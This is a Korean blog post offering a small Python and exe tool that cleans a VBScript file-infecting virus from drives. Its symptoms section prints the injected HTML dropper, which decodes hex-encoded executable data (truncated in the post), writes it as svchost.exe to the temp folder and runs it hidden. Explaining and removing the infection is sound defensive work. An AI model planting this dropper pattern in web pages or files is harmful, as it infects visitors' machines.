파리떼 바이러스 치료 프로그램 (VBScript parite)

antivirus.exe   일반 사용자용

antivirus.py 개발자용

주절주절

만들어 달라는 분이 계셔서 정말 간단하게 만든 python 파일입니다.. (py2exe로 사용해서 exe로 변환했구요. 스크립트 첨부했습니다.)

치료만 하실분들은 .exe파일을 받아서 실행하시면 됩니다. (개발자 분들 혹은 디버깅 용도로 사용하실 분들은 .py를 확인하시면 됩니다.)

* 상업적으로만 사용안하셨으면 하구요.(상업적으로 쓸일도 없겠지만..) CC만 남겨주신다면 수정/재배포 무한 가능합니다~

사용법

실행하셔서 치료하고 싶은 드라이버명 입력하면 됩니다.

예를 들자면.. C:\다 그러면 C:\입력하시구요. D:\다 싶으면 D:\입력하시면 됩니다.

C:\nopsled\909090\ 이렇게 입력하셔도 C:\드라이브 부터 치료합니다.. (예외처리 귀찮아서..)

감염증상

밑에는 감염되었을때 나타나는 문제인데 html에 DropFileName = "svchost.exe" 이런식으로 생기게 됩니다.

(관련 게시물 : http://nopsled.tistory.com/153)

</div>

</div>

</div>

</body>

</html><SCRIPT Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A90000300000004000000FFFF0000B80000000000000(....생략...)F95F9C363906578B80B5C9859752AE1DA05373CC889E80EC04574FB962CB574250AE1DEB16216218D0B3DE2A130319B79A1F071CE22E927D3760119CD5BF41057C67998D1B0E50AE1DEC3C124811F5E29E65253614B7C9102724FE6FCF30324839EEE59F77574F03DEBB233731C24DD23C07493EE880EC523E3D21C2A83B033CC272C353737A34EEF499653B0927D2AC574250EB65C927235E32FFE59F77574F55F3BB362516C773C9201B2C5DCBE9824C322325E0C9574250AE1DA053732C000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If FSO.FileExists(DropPath)=False Then

Set FileObj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step 2

FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

Next

FileObj.Close

End If

Set WSHshell = CreateObject("WScript.Shell")

WSHshell.Run DropPath, 0

//--></SCRIPT>